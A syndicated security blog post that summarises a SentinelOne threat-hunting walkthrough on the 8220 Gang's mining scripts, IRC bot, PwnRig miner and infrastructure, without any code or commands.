Learning How to Threat Hunt with the 8220 Gang

The 8220 Gang is a for-profit threat group from China that has been active since 2017, targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.

While the group is considered a low-level threat group, they have continued to advance and update its campaign over the years. The group is known for using various tactics and techniques to hide their activities and evade detection, such as using a blocklist to avoid tripping over honeypots.

Recently, SentinelOne covered the threat group in a blog post that explains how to investigate and track threats using the 8220 Gang’s activity as an example. The article is an excellent resource for new or less experienced SOC teams, analysts, and researchers who want to better understand attacker objectives and related threat intelligence.

The walkthrough in the article starts with the initial discovery of an interesting script found on a compromised AWS machine with publicly available SSH service secured with weak credentials. The script’s SHA1 a9da0947243333d95f84f6a0e37b9fc29b2fb054, is simple in design and built around the process of downloading and setting the persistence of some other files. The post then analyzes the script in detail, identifying unique additions like lwp-download combined with the destination of download requests.

Post-infection activity and sample pivots are also discussed. The 8220 Gang continues to use the old bash IRC bot “Tsunami” and a custom version of the open-source XMRig cryptocurrency miner called PwnRig.

The group’s repeated use of fake miner pool domains themed around the FBI is highlighted as a characteristic of the 8220 Gang. Using such themes and social engineering tactics makes their campaigns even more dangerous, as unsuspecting victims can be lured into providing access to their systems or personal information.

The infrastructure analysis in the article is particularly interesting, with the primary method of attribution being the reuse of infrastructure and identification of newly associated infrastructure. The article explains how tracking the 8220 Gang is aided somewhat by their failures in infrastructure OPSEC, with the group needing to be more organized and sophisticated in their infrastructure management. A better-organized infrastructure would make tracking the group’s activities even more complex and could lead to more successful attacks.

The 8220 Gang has been seen targeting Redis honeypots in the past. Radware previously reported on this campaign, highlighting the group’s use of fake miner pool domains and other social engineering tactics.

Using honeypots is common among security researchers to lure attackers into interacting with simulated systems and gather intelligence on their methods.

In conclusion, the post provides a straightforward understanding of the 8220 Gang’s use of malicious scripts, malware samples, and malicious infrastructure, making it a valuable resource for those looking to monitor and analyze malware samples, identify patterns in malicious scripts, and map out infrastructure. It is critical to remain vigilant and aware of such threats, especially for organizations with sensitive data or cloud-based operations. Regular monitoring and analyzing network traffic and system logs can help detect and prevent attacks before they cause significant harm.

The post Learning How to Threat Hunt with the 8220 Gang first appeared on PKTZ.

*** This is a Security Bloggers Network syndicated blog from PKTZ authored by pktzadmin. Read the original post at: